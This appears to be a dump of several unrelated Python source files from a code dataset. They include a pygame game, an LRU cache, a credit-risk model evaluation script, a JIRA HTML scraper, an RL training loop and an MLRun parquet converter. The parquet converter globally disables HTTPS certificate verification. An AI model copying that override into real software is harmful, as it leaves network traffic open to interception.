self.data[\"http\"][\"url\"] = span.tags.pop(ot_tags.HTTP_URL, None)\n self.data[\"http\"][\"path\"] = span.tags.pop(\"http.path\", None)\n self.data[\"http\"][\"params\"] = span.tags.pop('http.params', None)\n self.data[\"http\"][\"method\"] = span.tags.pop(ot_tags.HTTP_METHOD, None)\n self.data[\"http\"][\"status\"] = span.tags.pop(ot_tags.HTTP_STATUS_CODE, None)\n self.data[\"http\"][\"path_tpl\"] = span.tags.pop(\"http.path_tpl\", None)\n self.data[\"http\"][\"error\"] = span.tags.pop('http.error', None)\n\n if span.operation_name == \"soap\":\n self.data[\"soap\"][\"action\"] = span.tags.pop('soap.action', None)\n","sub_path":"instana/span.py","file_name":"span.py","file_ext":"py","file_size_in_byte":19874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"355838279","text":"import pygame\nfrom pygame.locals import K_ESCAPE, KEYDOWN, RLEACCEL\n\nimport config\nfrom sprites import Apple, Basket\n\n\n# Setup for sounds. Defaults are good.\npygame.mixer.init()\n\n# Initialize pygame\npygame.init()\n\n# Set up the drawing window\nscreen = pygame.display.set_mode((config.SCREEN_WIDTH, config.SCREEN_HEIGHT))\n\n# Setup the clock for a decent framerate\nclock = pygame.time.Clock()\n\n# Timer\ncounter, counter_text = 60, '60'.rjust(3)\nCOUNTDOWN = pygame.USEREVENT + 1\npygame.time.set_timer(COUNTDOWN, 1000)\n\n# Create a custom event for adding a new enemy\nADDAPPLE = pygame.USEREVENT + 1\npygame.time.set_timer(ADDAPPLE, 1000)\n\n# Instantiate the sprites\nbasket = Basket()\n\n# Sprite groups\napples = pygame.sprite.Group()\nall_sprites = pygame.sprite.Group()\nall_sprites.add(basket)\n\n# Sounds\nyeah_sound = pygame.mixer.Sound(\"yeah.ogg\")\n\n# Run until the user asks to quit\nrunning = True\nwhile running:\n\n # Font init\n pygame.font.init()\n myfont = pygame.font.SysFont('Consolas', 30)\n\n # Look at every event in the queue\n for event in pygame.event.get():\n # Did the user hit a key?\n if event.type == KEYDOWN:\n # Was it the Escape key? If so, stop the loop.\n if event.key == K_ESCAPE:\n running = False\n if event.type == pygame.QUIT:\n running = False\n\n # Add a new enemy?\n if event.type == ADDAPPLE:\n # Create the new enemy and add it to sprite groups\n new_apple = Apple()\n apples.add(new_apple)\n all_sprites.add(new_apple)\n\n # Timer event\n if event.type == COUNTDOWN:\n counter -= 1\n if counter > 0:\n counter_text = str(counter).rjust(3)\n else:\n running = False\n\n # Get the set of keys pressed and check for user input\n pressed_keys = pygame.key.get_pressed()\n\n # Update the player sprite based on user keypresses\n basket.update(pressed_keys)\n\n # Update enemy position\n apples.update()\n\n # Fill the background with white\n screen.fill(config.BACKGROUND_COLOR)\n\n # Draw all sprites\n for entity in all_sprites:\n screen.blit(entity.surf, entity.rect)\n\n # Check if any apples have collided with the basket\n apple_in_basket = pygame.sprite.spritecollideany(basket, apples)\n if apple_in_basket:\n # If so, then remove the player and stop the loop\n config.APPLES_IN_BASKET += 1\n yeah_sound.play()\n apple_in_basket.kill()\n\n # Show the amount of apples in the basket and the fallen ones\n apple_basket_counter = myfont.render(str(config.APPLES_IN_BASKET), False, (0, 128, 0))\n apple_floor_counter = myfont.render(str(config.APPLES_ON_FLOOR), False, (255, 0, 0))\n screen.blit(apple_basket_counter, (config.SCREEN_WIDTH - 40, 10))\n screen.blit(apple_floor_counter, (10, 10))\n # Show the time\n screen.blit(myfont.render(counter_text, True, (255, 255, 255)), (config.SCREEN_WIDTH / 2, 10))\n\n # Flip everything into the display\n pygame.display.flip()\n\n # Ensure program maintains a rate of 30 frames per second\n clock.tick(30)\n\n# Done! Time to quit.\nprint(\"You caught {} apples\".format(config.APPLES_IN_BASKET))\nprint(\"You dropped {} apples\".format(config.APPLES_ON_FLOOR))\npygame.quit()\n","sub_path":"meetup11/apples/apples.py","file_name":"apples.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"122545757","text":"#!/usr/bin/env python\n\n# Copyright (C) 2014 Hiroki Horiuchi \n#\n# [GNU all-permissive license]\n# Copying and distribution of this file, with or without modification,\n# are permitted in any medium without royalty provided the copyright\n# notice and this notice are preserved.\n# This file is offered as-is, without any warranty.\n\nfrom framework import one_shot\n\nfrom sys import argv\n\ndef g(conf):\n y = ''\n for key in 'default', 'timeout':\n value = conf.get(key)\n if value == None:\n continue\n y += 'set {}={}\\n'.format(key, value)\n if not y:\n return\n yield y\n\nif __name__ == '__main__':\n one_shot(argv[1:])\n","sub_path":"00autostart.py","file_name":"00autostart.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"135098737","text":"# -*- coding: utf-8 -*-\n\"\"\"\nLRU cache utility class.\n\n:author: Jinja Team.\n:copyright: Copyright (c) 2014, deipi.com LLC. All Rights Reserved.\n:copyright: Copyright (c) 2010 by the Jinja Team.\n:license: BSD, see LICENSE for license details.\n\nChanges:\n\nThis is different from Jinja's LRUCache in that it caches by type, so cached\nvalues of different types are cached in different queues of the same capacity.\n\n\"\"\"\nfrom __future__ import absolute_import\n\nfrom collections import deque\nfrom threading import RLock\n\n\nclass LRUCache(object):\n \"\"\"\n A type-based LRU Cache implementation.\n\n This is fast for small capacities (something below 1000) but doesn't scale.\n\n \"\"\"\n\n def __init__(self, capacity):\n self.capacity = capacity\n self._wlock = RLock()\n self._mapping = {}\n self._queues = {}\n\n def __getstate__(self):\n return {\n 'capacity': self.capacity,\n '_mapping': self._mapping,\n '_queues': self._queues,\n }\n\n def __setstate__(self, d):\n self.__dict__.update(d)\n\n def __getnewargs__(self):\n return (self.capacity,)\n\n def copy(self):\n \"\"\"\n Return a shallow copy of the instance.\n\n \"\"\"\n rv = self.__class__(self.capacity,)\n rv._mapping.update(self._mapping)\n rv._queues = dict((k, deque(v)) for k, v in self._queues)\n return rv\n\n def get(self, key, default=None):\n \"\"\"\n Return an item from the cache dict or ``default``\n\n \"\"\"\n try:\n return self[key]\n except KeyError:\n return default\n\n def setdefault(self, key, default=None):\n \"\"\"\n Set ``default`` if the key is not in the cache otherwise\n leave unchanged. Return the value of this key.\n\n \"\"\"\n with self._wlock:\n try:\n return self[key]\n except KeyError:\n self[key] = default\n return default\n\n def clear(self):\n \"\"\"Clear the cache.\"\"\"\n with self._wlock:\n self._mapping.clear()\n self._queues.clear()\n\n def __contains__(self, key):\n \"\"\"Check if a key exists in this cache.\"\"\"\n return key in self._mapping\n\n def __len__(self):\n \"\"\"Return the current size of the cache.\"\"\"\n return len(self._mapping)\n\n def __repr__(self):\n return '<%s %r>' % (\n self.__class__.__name__,\n self._mapping\n )\n\n def __getitem__(self, key):\n \"\"\"Get an item from the cache. Moves the item up so that it has the\n highest priority then.\n\n Raise a `KeyError` if it does not exist.\n \"\"\"\n with self._wlock:\n value = self._mapping[key]\n queue = self._queues.setdefault(type(value), deque())\n if not len(queue) or queue[-1] != key:\n try:\n queue.remove(key)\n except ValueError:\n pass\n queue.append(key)\n return value\n\n def __setitem__(self, key, value):\n \"\"\"\n Sets the value for an item. Moves the item up so that it\n has the highest priority then.\n\n \"\"\"\n with self._wlock:\n try:\n del self[key]\n except KeyError:\n pass\n queue = self._queues.setdefault(type(value), deque())\n if len(queue) == self.capacity:\n del self._mapping[queue.popleft()]\n self._mapping[key] = value\n queue.append(key)\n\n def __delitem__(self, key):\n \"\"\"\n Remove an item from the cache dict.\n Raise a ``KeyError`` if it does not exist.\n\n \"\"\"\n with self._wlock:\n try:\n value = self._mapping[key]\n except KeyError:\n return\n queue = self._queues.setdefault(type(value), deque())\n try:\n queue.remove(key)\n if not len(queue):\n del self._queues[type(value)]\n except ValueError:\n pass\n\n def items(self):\n \"\"\"\n Return a list of items.\n\n \"\"\"\n with self._wlock:\n result = [(key, self._mapping[key]) for key in self]\n result.reverse()\n return result\n\n def iteritems(self):\n \"\"\"\n Iterate over all items.\n\n \"\"\"\n return iter(self.items())\n\n def values(self):\n \"\"\"\n Return a list of all values.\n\n \"\"\"\n return [x[1] for x in self.items()]\n\n def itervalue(self):\n \"\"\"\n Iterate over all values.\n\n \"\"\"\n return iter(self.values())\n\n def keys(self):\n \"\"\"\n Return a list of all keys ordered by most recent usage.\n\n \"\"\"\n with self._wlock:\n result = [item for sublist in self._queues.values() for item in sublist]\n return result\n\n def iterkeys(self):\n \"\"\"\n Iterate over all keys in the cache dict, ordered by\n the most recent usage.\n\n \"\"\"\n return iter(self.keys())\n\n __iter__ = iterkeys\n\n def __reversed__(self):\n \"\"\"\n Iterate over the values in the cache dict, oldest items\n coming first.\n\n \"\"\"\n return reversed(self)\n\n __copy__ = copy\n\n\n# register the LRU cache as mutable mapping if possible\ntry:\n from collections import MutableMapping\n MutableMapping.register(LRUCache)\nexcept ImportError:\n pass\n","sub_path":"dubalusim/dubalu/python-packages/lru/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"156474176","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import f1_score, precision_score, recall_score, roc_auc_score\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.preprocessing import StandardScaler\n\nfrom univariate.common import tools\n\n# valid_columns = [\n# 'loan_counts',\n# 'other_loan_counts',\n# 'house_loan_counts',\n# 'house_loan2_counts',\n# 'paid_loan_counts',\n# 'unpaid_loan_counts',\n# 'card_counts',\n# 'undestroy_card_counts',\n# 'destroy_card_counts',\n# 'unpaid_loan_limit',\n# 'paid_loan_limit',\n# 'undestroy_card_limit',\n# 'destroy_card_limit',\n# 'first_loan_open_time_range',\n# 'last_paid_loan_end_time_range',\n# 'first_card_open_time_range',\n# 'last_destroy_card_end_time_range',\n#\n# 'loan_overdue_counts',\n# 'loan_overdue_counts_ratio',\n# 'loan_overdue_times',\n# 'loan_overdue_max_duration',\n# 'loan_overdue_max_monthly_amount',\n# 'loan_overdue_max_monthly_amount_ratio',\n# 'loan_last_overdue_time_range',\n# 'card_overdue_counts',\n# 'card_overdue_counts_ratio',\n# 'card_overdue_times',\n# 'card_overdue_max_duration',\n# 'card_overdue_max_monthly_amount',\n# 'card_overdue_max_monthly_amount_ratio',\n# 'card_last_overdue_time_range',\n#\n# 'overdue_times_past_year',\n# 'unpaid_loan_type_counts',\n# 'unpaid_loan_branch_counts',\n# 'unpaid_loan_corporation_counts',\n# 'unpaid_loan_average_limit',\n# 'unpaid_loan_balance',\n# 'unpaid_loan_average_balance',\n# 'unpaid_loan_balance_ratio',\n# 'unpaid_loan_max_remain_payment_cycle',\n# 'unpaid_microcredit_loan_counts',\n# 'unpaid_microcredit_loan_limit',\n# 'unpaid_unfixed_loan_counts',\n# 'unpaid_unfixed_loan_limit',\n# 'unpaid_microcredit_loan_max_remain_payment_cycle',\n# 'new_microcredit_loan_counts',\n# 'new_microcredit_loan_limit',\n# 'new_loan_counts',\n# 'new_loan_type_counts',\n# 'new_loan_limit',\n#\n# 'undestroy_card_max_limit',\n# 'paid_microcredit_loan_counts',\n# 'paid_microcredit_loan_limit',\n# 'last_paid_microcredit_loan_end_time_range',\n# 'paid_unfixed_loan_counts',\n# 'paid_unfixed_loan_limit',\n# 'last_paid_unfixed_loan_end_time_range'\n# ]\n\nvalid_columns = [\n 'loan_counts',\n 'other_loan_counts',\n 'house_loan_counts',\n 'house_loan2_counts',\n 'paid_loan_counts',\n 'unpaid_loan_counts',\n 'card_counts',\n 'undestroy_card_counts',\n 'destroy_card_counts',\n 'unpaid_loan_limit',\n 'paid_loan_limit',\n 'undestroy_card_limit',\n 'destroy_card_limit',\n 'first_loan_open_time_range',\n 'last_paid_loan_end_time_range',\n 'first_card_open_time_range',\n 'last_destroy_card_end_time_range',\n 'loan_overdue_counts',\n 'loan_overdue_counts_ratio',\n 'loan_overdue_times',\n 'loan_overdue_max_duration',\n 'loan_overdue_max_monthly_amount',\n 'loan_overdue_max_monthly_amount_ratio',\n 'loan_last_overdue_time_range',\n 'card_overdue_counts',\n 'card_overdue_counts_ratio',\n 'card_overdue_times',\n 'card_overdue_max_duration',\n 'card_overdue_max_monthly_amount',\n 'card_overdue_max_monthly_amount_ratio',\n 'card_last_overdue_time_range',\n 'overdue_times_past_year',\n 'unpaid_loan_type_counts',\n 'unpaid_loan_branch_counts',\n 'unpaid_loan_corporation_counts',\n 'unpaid_loan_average_limit',\n 'unpaid_loan_balance',\n 'unpaid_loan_average_balance',\n 'unpaid_loan_balance_ratio',\n 'unpaid_loan_max_remain_payment_cycle',\n 'unpaid_microcredit_loan_counts',\n 'unpaid_microcredit_loan_limit',\n 'unpaid_unfixed_loan_counts',\n 'unpaid_unfixed_loan_limit',\n 'unpaid_microcredit_loan_max_remain_payment_cycle',\n 'new_microcredit_loan_counts',\n 'new_microcredit_loan_limit',\n 'new_loan_counts',\n 'new_loan_type_counts',\n 'new_loan_limit',\n 'undestroy_card_max_limit',\n 'paid_microcredit_loan_counts',\n 'paid_microcredit_loan_limit',\n 'last_paid_microcredit_loan_end_time_range',\n 'paid_unfixed_loan_counts',\n 'paid_unfixed_loan_limit',\n 'last_paid_unfixed_loan_end_time_range',\n 'new_paid_loan_counts',\n 'new_paid_loan_limit',\n 'new_paid_loan_average_limit',\n 'new_paid_microcredit_loan_counts',\n 'new_paid_microcredit_loan_limit',\n 'new_paid_microcredit_loan_average_limit',\n 'new_paid_unfixed_loan_counts',\n 'new_paid_unfixed_loan_limit',\n 'new_paid_unfixed_loan_average_limit',\n 'paid_loan_counts_in_half_year',\n 'paid_loan_limit_in_half_year',\n 'paid_loan_average_limit_in_half_year',\n 'paid_microcredit_loan_counts_in_half_year',\n 'paid_microcredit_loan_limit_in_half_year',\n 'paid_microcredit_loan_average_limit_in_half_year',\n]\n\nlabel_list = []\nthreshold_list = []\nprecision_list = []\nrecall_list = []\nf1_list = []\nauc_list = []\nblack_ratio_list = []\nblack_num_list = []\nall_num_list = []\nfor threshold in [1, 2, 3, 4, 5, 6, 7]:\n for label in ['label_loan_card', 'label_loan', 'label_card']:\n df_train = pd.read_csv(\n 'data/train_threshold_{}_20180126_{}.csv'.format(threshold, label),\n encoding='gbk')\n df_train.replace(np.nan, 0, inplace=True)\n df_test = pd.read_csv(\n 'data/test_threshold_{}_20180126_{}.csv'.format(threshold, label),\n encoding='gbk')\n df_test.replace(np.nan, 0, inplace=True)\n\n for column in valid_columns:\n for df in [df_train, df_test]:\n df[column] = tools.fill(df[column], method='median')\n df[column] = tools.delete_or_fill_by_quantile(\n df[column], min_q=5, max_q=95, delete=False)\n\n X_train = df_train[valid_columns]\n y_train = df_train[label]\n X_test = df_test[valid_columns]\n y_test = df_test[label]\n\n scaler = StandardScaler()\n X_train_tr = scaler.fit_transform(X_train)\n X_test_tr = scaler.transform(X_test)\n X_train_tr = pd.DataFrame(\n X_train_tr, columns=X_train.columns, index=X_train.index)\n X_test_tr = pd.DataFrame(\n X_test_tr, columns=X_test.columns, index=X_test.index)\n\n forest_clf = RandomForestClassifier(\n n_estimators=20,\n n_jobs=-1,\n random_state=42,\n class_weight='balanced_subsample')\n forest_clf.fit(X_train, y_train)\n y_probas = cross_val_predict(\n forest_clf, X_train_tr, y_train, cv=3, method='predict_proba')\n y_scores = y_probas[:, 1]\n\n log_clf = LogisticRegression()\n log_clf.fit(X_train_tr, y_train)\n log_coef_df = pd.DataFrame({\n 'indicator': valid_columns,\n 'coef': log_clf.coef_[0]\n })\n log_coef_df.to_csv(\n 'data/log_coef_{}_{}.csv'.format(label, threshold), index=False)\n\n # fpr, tpr, thresholds = roc_curve(y_train, y_scores)\n # plot_roc_curve(fpr, tpr, \"Random Forest\")\n # plt.show()\n # plt.close()\n # precisions, recalls, thresholds = precision_recall_curve(y_train, y_scores)\n # plot_precision_recall_vs_threshold(precisions, recalls, thresholds)\n # plt.show()\n # plt.close()\n # plot_precision_vs_recall(precisions, recalls, label='Random Forest')\n # plt.show()\n # plt.close()\n max_f1 = 0\n opt_cutoff = 0.5\n for cutoff in np.linspace(0, 1, 100):\n precision = precision_score(y_train, y_scores >= cutoff)\n recall = recall_score(y_train, y_scores >= cutoff)\n f1 = f1_score(y_train, y_scores >= cutoff)\n if f1 > max_f1:\n max_f1 = f1\n opt_cutoff = cutoff\n precision = precision_score(y_train, y_scores >= opt_cutoff)\n recall = recall_score(y_train, y_scores >= opt_cutoff)\n f1 = f1_score(y_train, y_scores >= opt_cutoff)\n auc = roc_auc_score(y_train, y_scores)\n black_num = sum(y_train)\n all_num = len(y_train)\n black_ratio = black_num / all_num\n label_list.append(label)\n threshold_list.append(threshold)\n precision_list.append(precision)\n recall_list.append(recall)\n f1_list.append(f1)\n auc_list.append(auc)\n black_ratio_list.append(black_ratio)\n black_num_list.append(black_num)\n all_num_list.append(all_num)\n\nmodel_measurement_df = pd.DataFrame(\n {\n 'label': label_list,\n 'threshold': threshold_list,\n 'precision': precision_list,\n 'recall': recall_list,\n 'f1': f1_list,\n 'auc': auc_list,\n 'black_ratio': black_ratio_list,\n 'black_num': black_num_list,\n 'all_num': all_num_list\n },\n columns=[\n 'label', 'threshold', 'precision', 'recall', 'f1', 'auc',\n 'black_ratio', 'black_num', 'all_num'\n ])\n\nmodel_measurement_df.to_csv(\n 'data/random_model_measurement_20180126.csv', index=False)\n","sub_path":"rt_model_measurement.py","file_name":"rt_model_measurement.py","file_ext":"py","file_size_in_byte":9010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"384874112","text":"#import selenium\r\nfrom selenium import webdriver\r\n#from selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\n#import unittest\r\n#import time\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nimport numpy as np\r\nimport re\r\n\r\ndef getData(selected_value):\r\n '''\r\n chromedriver = 'C:\\\\Users\\\\rishabhchaudhary\\Downloads\\chromedriver_win32\\chromedriver.exe'\r\n #Edgedriver = 'C:\\\\Users\\RishabhChaudhary\\Downloads\\MicrosoftWebDriver.exe'\r\n #browser = webdriver.Edge(Edgedriver)\r\n\r\n options = webdriver.ChromeOptions()\r\n options.add_argument('headless')\r\n\r\n # set the window size\r\n options.add_argument('window-size=1200x600')\r\n\r\n browser = webdriver.Chrome(chromedriver, chrome_options=options)\r\n\r\n browser.get('https://jira.adeptra.com/secure/Dashboard.jspa')\r\n\r\n # Finding username and password fields\r\n try:\r\n userField = WebDriverWait(browser, 120).until(EC.presence_of_element_located((By.NAME, \"os_username\")))\r\n passwordField = WebDriverWait(browser, 120).until(EC.presence_of_element_located((By.NAME, \"os_password\")))\r\n finally:\r\n pass\r\n\r\n userField.send_keys(\"username\")\r\n passwordField.send_keys(\"password\")\r\n\r\n login_attempt = browser.find_element_by_xpath(\"//*[@id='login']\")\r\n login_attempt.submit()\r\n\r\n create_link = None\r\n\r\n try:\r\n create_link = WebDriverWait(browser, 120).until(\r\n EC.presence_of_element_located((By.ID, \"create_link\")))\r\n finally:\r\n pass\r\n\r\n if create_link:\r\n try:\r\n searchField = WebDriverWait(browser, 120).until(\r\n EC.presence_of_element_located((By.NAME, \"searchString\")))\r\n searchField.send_keys(\"CUSSGFRM-1\")\r\n searchField.submit()\r\n finally:\r\n pass\r\n\r\n html = browser.page_source\r\n\r\n soup = BeautifulSoup(html, 'html5lib')\r\n first_paragraph = soup.find('p') # or just soup.p\r\n first_paragraph\r\n '''\r\n\r\n\r\n #print(soup.prettify())\r\n\r\n with open(\"data.html\") as fp:\r\n soup = BeautifulSoup(fp, 'html5lib')\r\n\r\n JIRA = []\r\n DESC = []\r\n PHASE = []\r\n STATUS = []\r\n ASSIN = []\r\n\r\n for row in soup.find_all(class_ = 'issuerow'):\r\n JIRA.append(row.attrs['data-issuekey'])\r\n for col in row.find_all(class_ = 'stsummary'):\r\n #DESC.append(col.findall)\r\n for link in col.find_all('a'):\r\n DESC.append(link.text.strip())\r\n\r\n for col in row.find_all(class_='status'):\r\n for span in col.find_all('span'):\r\n STATUS.append(span.text.strip())\r\n\r\n for col in row.find_all(class_='assignee'):\r\n for link in col.find_all('a'):\r\n ASSIN.append(link.text.strip())\r\n\r\n delim = ' ','-',':','_'\r\n regexp = '|'.join(map(re.escape, delim))\r\n NEWDESC = []\r\n for desc in DESC:\r\n if ('qa' in desc.lower()) or ('cqa' in desc.lower()) or ('prod' in desc.lower()):\r\n PHASE.append(re.split(regexp, desc)[0].strip())\r\n NEWDESC.append(' '.join(re.split(regexp, desc)[1:]).replace('-',' ').strip())\r\n else:\r\n PHASE.append('NA')\r\n NEWDESC.append(desc.strip())\r\n\r\n df = pd.DataFrame({'WorkBlock': np.nan, 'JIRA': JIRA,\r\n 'Description': NEWDESC,\r\n 'Phase': PHASE,\r\n 'Status': STATUS,\r\n 'Assignee': ASSIN})\r\n\r\n df = df.fillna(value=selected_value)\r\n df = df.set_index(['WorkBlock', 'JIRA'])\r\n\r\n return df\r\n","sub_path":"getData.py","file_name":"getData.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"309004307","text":"# Copyright 2018 Iguazio\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport ssl\n\ntry:\n _create_unverified_https_context = ssl._create_unverified_context\nexcept AttributeError:\n # Legacy Python that doesn\"t verify HTTPS certificates by default\n pass\nelse:\n # Handle target environment that doesn\"t support HTTPS verification\n ssl._create_default_https_context = _create_unverified_https_context\n\nimport os\nimport json\nimport numpy as np\nimport pandas as pd\nimport pyarrow.parquet as pq\nimport pyarrow as pa\nfrom cloudpickle import dump, load\n\nfrom mlrun.execution import MLClientCtx\nfrom mlrun.datastore import DataItem\nfrom mlrun.artifacts import PlotArtifact, TableArtifact\n\nfrom typing import IO, AnyStr, Union, List, Optional\n\ndef arc_to_parquet(\n context: MLClientCtx,\n archive_url: Union[str, DataItem],\n header: Optional[List[str]] = None,\n chunksize: int = 10_000,\n dtype=None,\n encoding: str = \"latin-1\",\n key: str = \"data\",\n dataset: Optional[str] = None,\n part_cols = [],\n file_ext: str = 'pqt'\n) -> None:\n \"\"\"Open a file/object archive and save as a parquet file.\n\n Partitioning requires precise specification of column types.\n\n :param context: function context\n :param archive_url: any valid string path consistent with the path variable\n of pandas.read_csv, including strings as file paths, as urls, \n pathlib.Path objects, etc...\n :param header: column names\n :param chunksize: (0) row size retrieved per iteration\n :param dtype destination data type of specified columns\n :param encoding (\"latin-8\") file encoding\n :param key: key in artifact store (when log_data=True)\n :param dataset: (None) if not None then \"target_path/dataset\"\n is folder for partitioned files\n :param file_ext: (pqt) parquet file extension\n :param part_cols: ([]) list of partitioning columns\n\n \"\"\"\n base_path = context.artifact_path\n os.makedirs(base_path, exist_ok=True)\n\n if dataset is not None:\n dest_path = os.path.join(base_path, dataset)\n exists = os.path.isdir(dest_path)\n else:\n dest_path = os.path.join(base_path, key+f\".{file_ext}\")\n exists = os.path.isfile(dest_path)\n\n # todo: more logic for header\n if not exists:\n context.logger.info(\"destination file does not exist, downloading\")\n pqwriter = None\n for i, df in enumerate(pd.read_csv(archive_url, \n chunksize=chunksize, \n names=header,\n encoding=encoding, \n dtype=dtype)):\n table = pa.Table.from_pandas(df)\n if i == 0:\n if dataset:\n # just write header here\n pq.ParquetWriter(os.path.join(base_path,\"header-only.pqt\"), table.schema)\n else:\n # start writing file\n pqwriter = pq.ParquetWriter(dest_path, table.schema)\n context.log_artifact(\"header\", local_path=\"header-only.pqt\")\n if dataset:\n pq.write_to_dataset(table, root_path=dest_path, partition_cols=partition_cols)\n else:\n pqwriter.write_table(table)\n if pqwriter:\n pqwriter.close()\n\n context.logger.info(f\"saved table to {dest_path}\")\n else:\n context.logger.info(\"destination file already exists\")\n context.log_artifact(key, local_path=key+\".pqt\")\n","sub_path":"arc_to_parquet/arc_to_parquet.py","file_name":"arc_to_parquet.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"55862735","text":"# testing ....\n\n\n'''\n智能体与环境交互的基本流程\n\n整体分为四部分: 参数读入与初始化, 环境交互, 记忆重构, 参数训练\n'''\n\nimport numpy as np \nfrom six.moves import range\nfrom six.moves import zip\nfrom absl import app\nfrom absl import flags\nfrom envs.tpycolab import tenv as pycolab_env\nimport GBMRagent\nimport tensorflow as tf\nimport tensorflow.keras as keras\nimport tensorflow.keras.layers as layers\nimport gym\n\n'''\n超参数读入:��境相关,流程相关,智能体相关\n'''\nFLAGS = flags.FLAGS\n# 环境相关\n\n# flags.DEFINE_enum('pycolab_game', 'key_to_door',\n# ['key_to_door', 'active_visual_match'],\n# 'The name of the game in pycolab environment')\n# flags.DEFINE_integer('pycolab_num_apples', 10,\n# 'Number of apples to sample from the distractor grid.')\n# flags.DEFINE_float('pycolab_apple_reward_min', 1.,\n# 'A reward range [min, max) to uniformly sample from.')\n# flags.DEFINE_float('pycolab_apple_reward_max', 10.,\n# 'A reward range [min, max) to uniformly sample from.')\n# flags.DEFINE_boolean('pycolab_fix_apple_reward_in_episode', True,\n# 'Fix the sampled apple reward within an episode.')\n# flags.DEFINE_float('pycolab_final_reward', 10.,\n# 'Reward obtained at the last phase.')\n# flags.DEFINE_boolean('pycolab_crop', True,\n# 'Whether to crop observations or not.')\n\n# 尝试MsPacman\n# flags.DEFINE_enum('atari_game',\n# 'MsPacman-v0',\n# 'The name of the game in atari')\n\n# 流程相关\n\nflags.DEFINE_boolean('print_functionname', True,\n 'Whether to print_functionname.')\n\n# 智能体相关\n\nflags.DEFINE_integer('memory_size', 1000,'the number of nodes we are able to store in the graph.')\nflags.DEFINE_integer('memory_word_size', 32,'the lenth of words we are able to store in the graph.')\n\n\ndef main(_):\n if FLAGS.print_functionname == True:\n print(\"Hello world!\")\n\n # 环境初始化\n # env_kwargs = {\n # 'game': FLAGS.pycolab_game,\n # 'num_apples': FLAGS.pycolab_num_apples,\n # 'apple_reward': [FLAGS.pycolab_apple_reward_min,\n # FLAGS.pycolab_apple_reward_max],\n # 'fix_apple_reward_in_episode': FLAGS.pycolab_fix_apple_reward_in_episode,\n # 'final_reward': FLAGS.pycolab_final_reward,\n # 'crop': FLAGS.pycolab_crop\n # }\n # env_kwargs = {\n # 'game': FLAGS.pycolab_game\n # }\n # if FLAGS.print_functionname == True:\n # print(\"env_kwargs: \",env_kwargs)\n # env_builder = pycolab_env.PycolabEnvironment\n # env=env_builder(**env_kwargs) #以字典的形式传递参数,方便函数内部对参数的分别引用\n env = gym.make(\"MsPacman-v0\")\n #env = gym.make(\"CartPole-v1\")\n # ep_length = env.episode_length# 在key_to_door的环境中定义的\n ep_length = 200\n #num_actions = env.num_actions\n num_actions = env.action_space.n\n observation = env.reset()\n dim_obs = observation.shape\n if FLAGS.print_functionname == True:\n print(\"ep_length\",ep_length,\"num_actions\",num_actions,\"dim_obs\",dim_obs)\n\n # 智能体初始化\n agent = GBMRagent.Agent(num_actions=num_actions,dim_obs=dim_obs,memory_size=FLAGS.memory_size,memory_word_size=FLAGS.memory_word_size)\n # agent.vae_initial()\n agent.vaev_initial()\n\n ith_episode = 0 \n reward2step =[]\n while True:\n # 开始新的episode\n ith_episode += 1\n if FLAGS.print_functionname == True:\n print(\"ith_episode\", ith_episode)\n \n observation = env.reset()\n state = agent.obs2state(observation)\n observations =[]\n rewards =[]# 这个后来要用来算v值做监督信号\n epshistory = agent.EpsHistory_Initial()\n \n\n # 环境交互\n for tt in range(ep_length):\n # if FLAGS.print_functionname == True:\n # print(\"jth_step\",tt)\n #action = agent.TakeRandomAction()\n action, readinfo = agent.infer(state,epshistory)\n observation_, reward,_,_ = env.step(action)\n #env.render()\n state_ = agent.obs2state(observation_)\n epshistory = agent.EpsHistory_add([state,action,reward,state_])\n observation= observation_\n state= state_\n observations.append(observation)\n rewards.append(reward)\n reward2step.append(reward)\n\n # 记忆重构\n agent.Memory_update(epshistory)\n agent.Memory_abstract()\n agent.Memory_reconstruct()\n\n # 训练参数\n observations = np.stack(observations)\n rewards = np.stack(rewards)\n input_train = observations.reshape(ep_length, observations.shape[1]*observations.shape[2]*observations.shape[3]).astype('float32') / 255 \n rewards = rewards.reshape(ep_length,1).astype('float32') / 255 \n agent.vaev_train(input_train,rewards,epochs =2, batch_size =64)\n agent.train_agg()\n if len(reward2step)%100==0:\n print(\"write current data\",len(reward2step))\n np.save(\"rewstep.npy\",reward2step)\n\n\nif __name__ == '__main__':\n with tf.device('/gpu:0'):\n app.run(main)\n","sub_path":"Base/run_MsPacman.py","file_name":"run_MsPacman.py","file_ext":"py","file_size_in_byte":5290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"173396158","text":"import sys\nfrom sqlalchemy import create_engine\nfrom functools import reduce\nimport re\n\n__all__ = ['DatalogParser']\n\nclass DatalogParser:\n def __init__(self, q):\n q0 = q[0]\n self.result = q0['result'] # Ans(numunits, firstname, billdate)\n 